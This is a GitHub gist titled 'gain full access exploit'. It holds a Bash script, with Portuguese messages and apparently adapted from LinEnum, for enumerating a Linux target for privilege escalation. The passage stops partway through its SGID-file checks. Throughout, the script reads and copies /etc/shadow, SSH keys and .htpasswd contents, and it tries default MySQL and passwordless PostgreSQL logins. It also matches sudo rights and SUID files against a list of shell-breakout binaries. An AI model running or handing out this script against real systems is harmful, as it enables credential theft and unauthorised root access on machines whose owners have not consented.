Created
October 20, 2020 12:12
-
-
Save sn4k3-meyer/e6948411454adbf67473d11e9a0dfe87 to your computer and use it in GitHub Desktop.
gain full access exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Enumerando informações locais de um alvo linux | |
| # useful binaries (thanks to https://gtfobins.github.io/) | |
| binarylist='aria2c\|arp\|ash\|awk\|base64\|bash\|busybox\|cat\|chmod\|chown\|cp\|csh\|curl\|cut\|dash\|date\|dd\|diff\|dmsetup\|docker\|ed\|emacs\|env\|expand\|expect\|file\|find\|flock\|fmt\|fold\|ftp\|gawk\|gdb\|gimp\|git\|grep\|head\|ht\|iftop\|ionice\|ip$\|irb\|jjs\|jq\|jrunscript\|ksh\|ld.so\|ldconfig\|less\|logsave\|lua\|make\|man\|mawk\|more\|mv\|mysql\|nano\|nawk\|nc\|netcat\|nice\|nl\|nmap\|node\|od\|openssl\|perl\|pg\|php\|pic\|pico\|python\|readelf\|rlwrap\|rpm\|rpmquery\|rsync\|ruby\|run-parts\|rvim\|scp\|script\|sed\|setarch\|sftp\|sh\|shuf\|socat\|sort\|sqlite3\|ssh$\|start-stop-daemon\|stdbuf\|strace\|systemctl\|tail\|tar\|taskset\|tclsh\|tee\|telnet\|tftp\|time\|timeout\|ul\|unexpand\|uniq\|unshare\|vi\|vim\|watch\|wget\|wish\|xargs\|xxd\|zip\|zsh' | |
| system_info() | |
| { | |
| echo -e "Informações do sistema" | |
| procver=`cat /proc/version 2>/dev/null` | |
| if [ "$procver" ]; then | |
| echo -e "Informações do Kernel (continuação)\n$procver" | |
| echo -e "\n" | |
| fi | |
| #search all *-release files for version info | |
| release=`cat /etc/*-release 2>/dev/null` | |
| if [ "$release" ]; then | |
| echo -e "Informações especificas de release\n$release" | |
| echo -e "\n" | |
| fi | |
| #target hostname info | |
| hostnamed=`hostname 2>/dev/null` | |
| if [ "$hostnamed" ]; then | |
| echo -e "Hostname:\n$hostnamed" | |
| echo -e "\n" | |
| fi | |
| } | |
| user_info() | |
| { | |
| echo -e "Usario/Grupo" | |
| #current user details | |
| currusr=`id 2>/dev/null` | |
| if [ "$currusr" ]; then | |
| echo -e "Informações atuais do usuario/grupo\n$currusr" | |
| echo -e "\n" | |
| fi | |
| #last logged on user information | |
| lastlogedonusrs=`lastlog 2>/dev/null |grep -v "Never" 2>/dev/null` | |
| if [ "$lastlogedonusrs" ]; then | |
| echo -e "Usuario logado previamente no sistema\n$lastlogedonusrs" | |
| echo -e "\n" | |
| fi | |
| #who else is logged on | |
| loggedonusrs=`w 2>/dev/null` | |
| if [ "$loggedonusrs" ]; then | |
| echo -e "Quem esta logado agora?\n$loggedonusrs" | |
| echo -e "\n" | |
| fi | |
| #lists all id's and respective group(s) | |
| grpinfo=`for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null` | |
| if [ "$grpinfo" ]; then | |
| echo -e "Associacoes de grupos\n$grpinfo" | |
| echo -e "\n" | |
| fi | |
| #added by phackt - look for adm group (thanks patrick) | |
| adm_users=$(echo -e "$grpinfo" | grep "(adm)") | |
| if [[ ! -z $adm_users ]]; | |
| then | |
| echo -e "Procurando algum usuario administrador\n$adm_users" | |
| echo -e "\n" | |
| fi | |
| #checks to see if any hashes are stored in /etc/passwd (depreciated *nix storage method) | |
| hashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null` | |
| if [ "$hashesinpasswd" ]; then | |
| echo -e "Procurando passwords hashes in /etc/passwd\n$hashesinpasswd" | |
| echo -e "\n" | |
| fi | |
| #contents of /etc/passwd | |
| readpasswd=`cat /etc/passwd 2>/dev/null` | |
| if [ "$readpasswd" ]; then | |
| echo -e "Conteudo de /etc/passwd\n$readpasswd" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$readpasswd" ]; then | |
| mkdir $format/etc-export/ 2>/dev/null | |
| cp /etc/passwd $format/etc-export/passwd 2>/dev/null | |
| fi | |
| #checks to see if the shadow file can be read | |
| readshadow=`cat /etc/shadow 2>/dev/null` | |
| if [ "$readshadow" ]; then | |
| echo -e "Podemos ler /etc/shadow?\n$readshadow" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$readshadow" ]; then | |
| mkdir $format/etc-export/ 2>/dev/null | |
| cp /etc/shadow $format/etc-export/shadow 2>/dev/null | |
| fi | |
| #checks to see if /etc/master.passwd can be read - BSD 'shadow' variant | |
| readmasterpasswd=`cat /etc/master.passwd 2>/dev/null` | |
| if [ "$readmasterpasswd" ]; then | |
| echo -e "Podemos ler /etc/master.passwd?\n$readmasterpasswd" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$readmasterpasswd" ]; then | |
| mkdir $format/etc-export/ 2>/dev/null | |
| cp /etc/master.passwd $format/etc-export/master.passwd 2>/dev/null | |
| fi | |
| #all root accounts (uid 0) | |
| superman=`grep -v -E "^#" /etc/passwd 2>/dev/null| awk -F: '$3 == 0 { print $1}' 2>/dev/null` | |
| if [ "$superman" ]; then | |
| echo -e "Root accounts\n$superman" | |
| echo -e "\n" | |
| fi | |
| #pull out vital sudoers info | |
| sudoers=`grep -v -e '^$' /etc/sudoers 2>/dev/null |grep -v "#" 2>/dev/null` | |
| if [ "$sudoers" ]; then | |
| echo -e "Configuraco sudoer (condensada)$sudoers" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$sudoers" ]; then | |
| mkdir $format/etc-export/ 2>/dev/null | |
| cp /etc/sudoers $format/etc-export/sudoers 2>/dev/null | |
| fi | |
| #can we sudo without supplying a password | |
| sudoperms=`echo '' | sudo -S -l -k 2>/dev/null` | |
| if [ "$sudoperms" ]; then | |
| echo -e "Temos sudo com fornecimento de senha\n$sudoperms" | |
| echo -e "\n" | |
| fi | |
| #check sudo perms - authenticated | |
| if [ "$sudopass" ]; then | |
| if [ "$sudoperms" ]; then | |
| : | |
| else | |
| sudoauth=`echo $userpassword | sudo -S -l -k 2>/dev/null` | |
| if [ "$sudoauth" ]; then | |
| echo -e "Temos sudo se fornecido senha?\n$sudoauth" | |
| echo -e "\n" | |
| fi | |
| fi | |
| fi | |
| ##known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values) - authenticated | |
| if [ "$sudopass" ]; then | |
| if [ "$sudoperms" ]; then | |
| : | |
| else | |
| sudopermscheck=`echo $userpassword | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null|sed 's/,*$//g' 2>/dev/null | grep -w $binarylist 2>/dev/null` | |
| if [ "$sudopermscheck" ]; then | |
| echo -e "Possivel sudo ownado\n$sudopermscheck" | |
| echo -e "\n" | |
| fi | |
| fi | |
| fi | |
| #known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values) | |
| sudopwnage=`echo '' | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null | sed 's/,*$//g' 2>/dev/null | grep -w $binarylist 2>/dev/null` | |
| if [ "$sudopwnage" ]; then | |
| echo -e "Possivel sudo ownado\n$sudopwnage" | |
| echo -e "\n" | |
| fi | |
| #who has sudoed in the past | |
| whohasbeensudo=`find /home -name .sudo_as_admin_successful 2>/dev/null` | |
| if [ "$whohasbeensudo" ]; then | |
| echo -e "Contas de sudo ownadas\n$whohasbeensudo" | |
| echo -e "\n" | |
| fi | |
| #checks to see if roots home directory is accessible | |
| rthmdir=`ls -ahl /root/ 2>/dev/null` | |
| if [ "$rthmdir" ]; then | |
| echo -e "Podemos ler arquivos de root?\n$rthmdir" | |
| echo -e "\n" | |
| fi | |
| #displays /home directory permissions - check if any are lax | |
| homedirperms=`ls -ahl /home/ 2>/dev/null` | |
| if [ "$homedirperms" ]; then | |
| echo -e "Temos permissoes de ler /home?\n$homedirperms" | |
| echo -e "\n" | |
| fi | |
| #looks for files we can write to that don't belong to us | |
| if [ "$thorough" = "1" ]; then | |
| grfilesall=`find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null` | |
| if [ "$grfilesall" ]; then | |
| echo -e "Arquivos nao pertencentes ao usuario mas com permissao de leitura pelo grupo\n$grfilesall" | |
| echo -e "\n" | |
| fi | |
| fi | |
| #looks for files that belong to us | |
| if [ "$thorough" = "1" ]; then | |
| ourfilesall=`find / -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null` | |
| if [ "$ourfilesall" ]; then | |
| echo -e "Arquivos pertencentes ao nosso usuario\n$ourfilesall" | |
| echo -e "\n" | |
| fi | |
| fi | |
| #looks for hidden files | |
| if [ "$thorough" = "1" ]; then | |
| hiddenfiles=`find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null` | |
| if [ "$hiddenfiles" ]; then | |
| echo -e "Arquivos ocultos\n$hiddenfiles" | |
| echo -e "\n" | |
| fi | |
| fi | |
| #looks for world-reabable files within /home - depending on number of /home dirs & files, this can take some time so is only 'activated' with thorough scanning switch | |
| if [ "$thorough" = "1" ]; then | |
| wrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null` | |
| if [ "$wrfileshm" ]; then | |
| echo -e "Arquivos de leitura em /home\n$wrfileshm" | |
| echo -e "\n" | |
| fi | |
| fi | |
| if [ "$thorough" = "1" ]; then | |
| if [ "$export" ] && [ "$wrfileshm" ]; then | |
| mkdir $format/wr-files/ 2>/dev/null | |
| for i in $wrfileshm; do cp --parents $i $format/wr-files/ ; done 2>/dev/null | |
| fi | |
| fi | |
| #lists current user's home directory contents | |
| if [ "$thorough" = "1" ]; then | |
| homedircontents=`ls -ahl ~ 2>/dev/null` | |
| if [ "$homedircontents" ] ; then | |
| echo -e "Conteudo do diretorio /home\n$homedircontents" | |
| echo -e "\n" | |
| fi | |
| fi | |
| #checks for if various ssh files are accessible - this can take some time so is only 'activated' with thorough scanning switch | |
| if [ "$thorough" = "1" ]; then | |
| sshfiles=`find / \( -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} 2>/dev/null \;` | |
| if [ "$sshfiles" ]; then | |
| echo -e "SSH KEYs\n$sshfiles" | |
| echo -e "\n" | |
| fi | |
| fi | |
| if [ "$thorough" = "1" ]; then | |
| if [ "$export" ] && [ "$sshfiles" ]; then | |
| mkdir $format/ssh-files/ 2>/dev/null | |
| for i in $sshfiles; do cp --parents $i $format/ssh-files/; done 2>/dev/null | |
| fi | |
| fi | |
| #is root permitted to login via ssh | |
| sshrootlogin=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}'` | |
| if [ "$sshrootlogin" = "yes" ]; then | |
| echo -e "Permissao de login no root via SSH" ; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | |
| echo -e "\n" | |
| fi | |
| } | |
| environmental_info() | |
| { | |
| echo -e "MEIO AMBIENTE" | |
| #env information | |
| envinfo=`env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null` | |
| if [ "$envinfo" ]; then | |
| echo -e "Informacoes do meio ambiente\n$envinfo" | |
| echo -e "\n" | |
| fi | |
| #check if selinux is enabled | |
| sestatus=`sestatus 2>/dev/null` | |
| if [ "$sestatus" ]; then | |
| echo -e "Checando se o selinux esta presente\n$sestatus" | |
| echo -e "\n" | |
| fi | |
| #phackt | |
| #current path configuration | |
| pathinfo=`echo $PATH 2>/dev/null` | |
| if [ "$pathinfo" ]; then | |
| pathswriteable=`ls -ld $(echo $PATH | tr ":" " ")` | |
| echo -e "Informacoes de path\n$pathinfo" | |
| echo -e "$pathswriteable" | |
| echo -e "\n" | |
| fi | |
| #lists available shells | |
| shellinfo=`cat /etc/shells 2>/dev/null` | |
| if [ "$shellinfo" ]; then | |
| echo -e "Possiveis shells\n$shellinfo" | |
| echo -e "\n" | |
| fi | |
| #current umask value with both octal and symbolic output | |
| umaskvalue=`umask -S 2>/dev/null & umask 2>/dev/null` | |
| if [ "$umaskvalue" ]; then | |
| echo -e "Valor da umask atual\n$umaskvalue" | |
| echo -e "\n" | |
| fi | |
| #umask value as in /etc/login.defs | |
| umaskdef=`grep -i "^UMASK" /etc/login.defs 2>/dev/null` | |
| if [ "$umaskdef" ]; then | |
| echo -e "Valor especifico do umask in /etc/login.defs\n$umaskdef" | |
| echo -e "\n" | |
| fi | |
| #password policy information as stored in /etc/login.defs | |
| logindefs=`grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null` | |
| if [ "$logindefs" ]; then | |
| echo -e "Passwords e informacoes armazenadas\n$logindefs" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$logindefs" ]; then | |
| mkdir $format/etc-export/ 2>/dev/null | |
| cp /etc/login.defs $format/etc-export/login.defs 2>/dev/null | |
| fi | |
| } | |
| job_info() | |
| { | |
| echo -e "Trabalhos e tarefas" | |
| #are there any cron jobs configured | |
| cronjobs=`ls -la /etc/cron* 2>/dev/null` | |
| if [ "$cronjobs" ]; then | |
| echo -e "Cron\n$cronjobs" | |
| echo -e "\n" | |
| fi | |
| #can we manipulate these jobs in any way | |
| cronjobwwperms=`find /etc/cron* -perm -0002 -type f -exec ls -la {} \; -exec cat {} 2>/dev/null \;` | |
| if [ "$cronjobwwperms" ]; then | |
| echo -e "Cron jobs\n$cronjobwwperms" | |
| echo -e "\n" | |
| fi | |
| #contab contents | |
| crontabvalue=`cat /etc/crontab 2>/dev/null` | |
| if [ "$crontabvalue" ]; then | |
| echo -e "Conteudo de crontab\n$crontabvalue" | |
| echo -e "\n" | |
| fi | |
| crontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null` | |
| if [ "$crontabvar" ]; then | |
| echo -e "Qualquer coisa interessante in /var/spool/cron/crontabs:\n$crontabvar" | |
| echo -e "\n" | |
| fi | |
| anacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null` | |
| if [ "$anacronjobs" ]; then | |
| echo -e "Trabalhos do Anacron e permissões de arquivo associadas\n$anacronjobs" | |
| echo -e "\n" | |
| fi | |
| anacrontab=`ls -la /var/spool/anacron 2>/dev/null` | |
| if [ "$anacrontab" ]; then | |
| echo -e "Quando os trabalhos foram executados pela última vez (conteúdo de /var/spool/anacron):\n$anacrontab" | |
| echo -e "\n" | |
| fi | |
| #pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command) | |
| cronother=`cut -d ":" -f 1 /etc/passwd | xargs -n1 crontab -l -u 2>/dev/null` | |
| if [ "$cronother" ]; then | |
| echo -e "Trabalhos de todos os usuarios\n$cronother" | |
| echo -e "\n" | |
| fi | |
| # list systemd timers | |
| if [ "$thorough" = "1" ]; then | |
| # include inactive timers in thorough mode | |
| systemdtimers="$(systemctl list-timers --all 2>/dev/null)" | |
| info="" | |
| else | |
| systemdtimers="$(systemctl list-timers 2>/dev/null |head -n -1 2>/dev/null)" | |
| # replace the info in the output with a hint towards thorough mode | |
| info="Temporizadores inativos" | |
| fi | |
| if [ "$systemdtimers" ]; then | |
| echo -e "Systemd timers\n$systemdtimers\n$info" | |
| echo -e "\n" | |
| fi | |
| } | |
| networking_info() | |
| { | |
| echo -e "NETWORK" | |
| #nic information | |
| nicinfo=`/sbin/ifconfig -a 2>/dev/null` | |
| if [ "$nicinfo" ]; then | |
| echo -e "Network IP info\n$nicinfo" | |
| echo -e "\n" | |
| fi | |
| #nic information (using ip) | |
| nicinfoip=`/sbin/ip a 2>/dev/null` | |
| if [ ! "$nicinfo" ] && [ "$nicinfoip" ]; then | |
| echo -e "IP info\n$nicinfoip" | |
| echo -e "\n" | |
| fi | |
| arpinfo=`arp -a 2>/dev/null` | |
| if [ "$arpinfo" ]; then | |
| echo -e "ARP History\n$arpinfo" | |
| echo -e "\n" | |
| fi | |
| arpinfoip=`ip n 2>/dev/null` | |
| if [ ! "$arpinfo" ] && [ "$arpinfoip" ]; then | |
| echo -e "ARP History\n$arpinfoip" | |
| echo -e "\n" | |
| fi | |
| #dns settings | |
| nsinfo=`grep "nameserver" /etc/resolv.conf 2>/dev/null` | |
| if [ "$nsinfo" ]; then | |
| echo -e "Nameserver\n$nsinfo" | |
| echo -e "\n" | |
| fi | |
| nsinfosysd=`systemd-resolve --status 2>/dev/null` | |
| if [ "$nsinfosysd" ]; then | |
| echo -e "Nameserver\n$nsinfosysd" | |
| echo -e "\n" | |
| fi | |
| #default route configuration | |
| defroute=`route 2>/dev/null | grep default` | |
| if [ "$defroute" ]; then | |
| echo -e "Rota padrao\n$defroute" | |
| echo -e "\n" | |
| fi | |
| #default route configuration | |
| defrouteip=`ip r 2>/dev/null | grep default` | |
| if [ ! "$defroute" ] && [ "$defrouteip" ]; then | |
| echo -e "Rota padrao\n$defrouteip" | |
| echo -e "\n" | |
| fi | |
| #listening TCP | |
| tcpservs=`netstat -ntpl 2>/dev/null` | |
| if [ "$tcpservs" ]; then | |
| echo -e "Ouvindo TCP\n$tcpservs" | |
| echo -e "\n" | |
| fi | |
| tcpservsip=`ss -t -l -n 2>/dev/null` | |
| if [ ! "$tcpservs" ] && [ "$tcpservsip" ]; then | |
| echo -e "Ouvindo TCP\n$tcpservsip" | |
| echo -e "\n" | |
| fi | |
| #listening UDP | |
| udpservs=`netstat -nupl 2>/dev/null` | |
| if [ "$udpservs" ]; then | |
| echo -e "Ouvindo UDP\n$udpservs" | |
| echo -e "\n" | |
| fi | |
| udpservsip=`ss -u -l -n 2>/dev/null` | |
| if [ ! "$udpservs" ] && [ "$udpservsip" ]; then | |
| echo -e "Ouvindo UDP\n$udpservsip" | |
| echo -e "\n" | |
| fi | |
| } | |
| services_info() | |
| { | |
| echo -e "SERVICOS" | |
| #running processes | |
| psaux=`ps aux 2>/dev/null` | |
| if [ "$psaux" ]; then | |
| echo -e "Processos em execucao\n$psaux" | |
| echo -e "\n" | |
| fi | |
| #lookup process binary path and permissisons | |
| procperm=`ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null` | |
| if [ "$procperm" ]; then | |
| echo -e "Binarios e processos em execucao\n$procperm" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$procperm" ]; then | |
| procpermbase=`ps aux 2>/dev/null | awk '{print $11}' | xargs -r ls 2>/dev/null | awk '!x[$0]++' 2>/dev/null` | |
| mkdir $format/ps-export/ 2>/dev/null | |
| for i in $procpermbase; do cp --parents $i $format/ps-export/; done 2>/dev/null | |
| fi | |
| #anything 'useful' in inetd.conf | |
| inetdread=`cat /etc/inetd.conf 2>/dev/null` | |
| if [ "$inetdread" ]; then | |
| echo -e "Conteudo de /etc/inetd.conf:\n$inetdread" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$inetdread" ]; then | |
| mkdir $format/etc-export/ 2>/dev/null | |
| cp /etc/inetd.conf $format/etc-export/inetd.conf 2>/dev/null | |
| fi | |
| #very 'rough' command to extract associated binaries from inetd.conf & show permisisons of each | |
| inetdbinperms=`awk '{print $7}' /etc/inetd.conf 2>/dev/null |xargs -r ls -la 2>/dev/null` | |
| if [ "$inetdbinperms" ]; then | |
| echo -e "Permissoes dos binarios\n$inetdbinperms" | |
| echo -e "\n" | |
| fi | |
| xinetdread=`cat /etc/xinetd.conf 2>/dev/null` | |
| if [ "$xinetdread" ]; then | |
| echo -e "Conteudo de /etc/xinetd.conf:\n$xinetdread" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$xinetdread" ]; then | |
| mkdir $format/etc-export/ 2>/dev/null | |
| cp /etc/xinetd.conf $format/etc-export/xinetd.conf 2>/dev/null | |
| fi | |
| xinetdincd=`grep "/etc/xinetd.d" /etc/xinetd.conf 2>/dev/null` | |
| if [ "$xinetdincd" ]; then | |
| echo -e "Permissoes dos binarios associados:"; ls -la /etc/xinetd.d 2>/dev/null | |
| echo -e "\n" | |
| fi | |
| #very 'rough' command to extract associated binaries from xinetd.conf & show permisisons of each | |
| xinetdbinperms=`awk '{print $7}' /etc/xinetd.conf 2>/dev/null |xargs -r ls -la 2>/dev/null` | |
| if [ "$xinetdbinperms" ]; then | |
| echo -e "\Permissoes dos binarios xinetd:\n$xinetdbinperms" | |
| echo -e "\n" | |
| fi | |
| initdread=`ls -la /etc/init.d 2>/dev/null` | |
| if [ "$initdread" ]; then | |
| echo -e "/etc/init.d/ Permissoes dos binarios:\n$initdread" | |
| echo -e "\n" | |
| fi | |
| #init.d files NOT belonging to root! | |
| initdperms=`find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` | |
| if [ "$initdperms" ]; then | |
| echo -e "/etc/init.d/ Arquivos abaixo de root\n$initdperms" | |
| echo -e "\n" | |
| fi | |
| rcdread=`ls -la /etc/rc.d/init.d 2>/dev/null` | |
| if [ "$rcdread" ]; then | |
| echo -e "/etc/rc.d/init.d Permissoes de binarios\n$rcdread" | |
| echo -e "\n" | |
| fi | |
| #init.d files NOT belonging to root! | |
| rcdperms=`find /etc/rc.d/init.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` | |
| if [ "$rcdperms" ]; then | |
| echo -e "/etc/rc.d/init.d Binarios fora do root\n$rcdperms" | |
| echo -e "\n" | |
| fi | |
| usrrcdread=`ls -la /usr/local/etc/rc.d 2>/dev/null` | |
| if [ "$usrrcdread" ]; then | |
| echo -e "/usr/local/etc/rc.d Permissoes de binarios\n$usrrcdread" | |
| echo -e "\n" | |
| fi | |
| #rc.d files NOT belonging to root! | |
| usrrcdperms=`find /usr/local/etc/rc.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` | |
| if [ "$usrrcdperms" ]; then | |
| echo -e "/usr/local/etc/rc.d Arquivos nao pertencentes a root\n$usrrcdperms" | |
| echo -e "\n" | |
| fi | |
| initread=`ls -la /etc/init/ 2>/dev/null` | |
| if [ "$initread" ]; then | |
| echo -e "/etc/init/ Permissoes dos arquivos de configuracao\n$initread" | |
| echo -e "\n" | |
| fi | |
| # upstart scripts not belonging to root | |
| initperms=`find /etc/init \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` | |
| if [ "$initperms" ]; then | |
| echo -e "/etc/init/ Arquivos de configuracoes nao pertencentes ao root\n$initperms" | |
| echo -e "\n" | |
| fi | |
| systemdread=`ls -lthR /lib/systemd/ 2>/dev/null` | |
| if [ "$systemdread" ]; then | |
| echo -e "/lib/systemd/* Permissoes nos arquivos de configuracao\n$systemdread" | |
| echo -e "\n" | |
| fi | |
| # systemd files not belonging to root | |
| systemdperms=`find /lib/systemd/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` | |
| if [ "$systemdperms" ]; then | |
| echo -e "/lib/systemd/* Arquivos de configuracao nao pertecentes ao root\n$systemdperms" | |
| echo -e "\n" | |
| fi | |
| } | |
| software_configs() | |
| { | |
| echo -e "SOFTWARE" | |
| #sudo version - check to see if there are any known vulnerabilities with this | |
| sudover=`sudo -V 2>/dev/null| grep "Sudo version" 2>/dev/null` | |
| if [ "$sudover" ]; then | |
| echo -e "Versao do sudo\n$sudover" | |
| echo -e "\n" | |
| fi | |
| #mysql details - if installed | |
| mysqlver=`mysql --version 2>/dev/null` | |
| if [ "$mysqlver" ]; then | |
| echo -e "Versao do MySQL\n$mysqlver" | |
| echo -e "\n" | |
| fi | |
| #checks to see if root/root will get us a connection | |
| mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` | |
| if [ "$mysqlconnect" ]; then | |
| echo -e "Checando se existe conexao default no MYSQL\n$mysqlconnect" | |
| echo -e "\n" | |
| fi | |
| #mysql version details | |
| mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` | |
| if [ "$mysqlconnectnopass" ]; then | |
| echo -e "Conectando no MySQL com user root e sem password\n$mysqlconnectnopass" | |
| echo -e "\n" | |
| fi | |
| #postgres details - if installed | |
| postgver=`psql -V 2>/dev/null` | |
| if [ "$postgver" ]; then | |
| echo -e "Versao postgree\n$postgver" | |
| echo -e "\n" | |
| fi | |
| #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this | |
| postcon1=`psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version` | |
| if [ "$postcon1" ]; then | |
| echo -e "Podemos nos conectar no postgree com usuario postgree e sem senha\n$postcon1" | |
| echo -e "\n" | |
| fi | |
| postcon11=`psql -U postgres -w template1 -c 'select version()' 2>/dev/null | grep version` | |
| if [ "$postcon11" ]; then | |
| echo -e "Sem conexao ao postgree com usuario e sem senha\n$postcon11" | |
| echo -e "\n" | |
| fi | |
| postcon2=`psql -U pgsql -w template0 -c 'select version()' 2>/dev/null | grep version` | |
| if [ "$postcon2" ]; then | |
| echo -e "Conectando em postgree com user psql sem senha\n$postcon2" | |
| echo -e "\n" | |
| fi | |
| postcon22=`psql -U pgsql -w template1 -c 'select version()' 2>/dev/null | grep version` | |
| if [ "$postcon22" ]; then | |
| echo -e "Sem conexao ao psql\n$postcon22" | |
| echo -e "\n" | |
| fi | |
| #apache details - if installed | |
| apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null` | |
| if [ "$apachever" ]; then | |
| echo -e "Versao do apache\n$apachever" | |
| echo -e "\n" | |
| fi | |
| #what account is apache running under | |
| apacheusr=`grep -i 'user\|group' /etc/apache2/envvars 2>/dev/null |awk '{sub(/.*\export /,"")}1' 2>/dev/null` | |
| if [ "$apacheusr" ]; then | |
| echo -e "Configuracao do usuario apache\n$apacheusr" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$apacheusr" ]; then | |
| mkdir --parents $format/etc-export/apache2/ 2>/dev/null | |
| cp /etc/apache2/envvars $format/etc-export/apache2/envvars 2>/dev/null | |
| fi | |
| #installed apache modules | |
| apachemodules=`apache2ctl -M 2>/dev/null; httpd -M 2>/dev/null` | |
| if [ "$apachemodules" ]; then | |
| echo -e "Modulos do apache instalado\n$apachemodules" | |
| echo -e "\n" | |
| fi | |
| #htpasswd check | |
| htpasswd=`find / -name .htpasswd -print -exec cat {} \; 2>/dev/null` | |
| if [ "$htpasswd" ]; then | |
| echo -e "htpasswd encontrado - com senha\n$htpasswd" | |
| echo -e "\n" | |
| fi | |
| #anything in the default http home dirs (a thorough only check as output can be large) | |
| if [ "$thorough" = "1" ]; then | |
| apachehomedirs=`ls -alhR /var/www/ 2>/dev/null; ls -alhR /srv/www/htdocs/ 2>/dev/null; ls -alhR /usr/local/www/apache2/data/ 2>/dev/null; ls -alhR /opt/lampp/htdocs/ 2>/dev/null` | |
| if [ "$apachehomedirs" ]; then | |
| echo -e "www home dir conteudos:\n$apachehomedirs" | |
| echo -e "\n" | |
| fi | |
| fi | |
| } | |
| interesting_files() | |
| { | |
| echo -e "ARQUIVOS INTERESSENTES" | |
| #checks to see if various files are installed | |
| echo -e "Local de arquivos util" ; which nc 2>/dev/null ; which netcat 2>/dev/null ; which wget 2>/dev/null ; which nmap 2>/dev/null ; which gcc 2>/dev/null; which curl 2>/dev/null | |
| echo -e "\n" | |
| #limited search for installed compilers | |
| compiler=`dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null` | |
| if [ "$compiler" ]; then | |
| echo -e "Compiladores instalados\n$compiler" | |
| echo -e "\n" | |
| fi | |
| #manual check - lists out sensitive files, can we read/modify etc. | |
| echo -e "Arquivos sensiveis" ; ls -la /etc/passwd 2>/dev/null ; ls -la /etc/group 2>/dev/null ; ls -la /etc/profile 2>/dev/null; ls -la /etc/shadow 2>/dev/null ; ls -la /etc/master.passwd 2>/dev/null | |
| echo -e "\n" | |
| #search for suid files | |
| allsuid=`find / -perm -4000 -type f 2>/dev/null` | |
| findsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \;` | |
| if [ "$findsuid" ]; then | |
| echo -e "Arquivos SUID\n$findsuid" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$findsuid" ]; then | |
| mkdir $format/suid-files/ 2>/dev/null | |
| for i in $findsuid; do cp $i $format/suid-files/; done 2>/dev/null | |
| fi | |
| #list of 'interesting' suid files - feel free to make additions | |
| intsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null` | |
| if [ "$intsuid" ]; then | |
| echo -e "Possiveis SUIDs interessantes\n$intsuid" | |
| echo -e "\n" | |
| fi | |
| #lists world-writable suid files | |
| wwsuid=`find $allsuid -perm -4002 -type f -exec ls -la {} 2>/dev/null \;` | |
| if [ "$wwsuid" ]; then | |
| echo -e "Leitura/Escrita SUID\n$wwsuid" | |
| echo -e "\n" | |
| fi | |
| #lists world-writable suid files owned by root | |
| wwsuidrt=`find $allsuid -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;` | |
| if [ "$wwsuidrt" ]; then | |
| echo -e "Arquivos SUID do root\n$wwsuidrt" | |
| echo -e "\n" | |
| fi | |
| #search for sgid files | |
| allsgid=`find / -perm -2000 -type f 2>/dev/null` | |
| findsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} 2>/dev/null \;` | |
| if [ "$findsgid" ]; then | |
| echo -e "SGID arquivos\n$findsgid" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$findsgid" ]; then | |
| mkdir $format/sgid-files/ 2>/dev/null | |
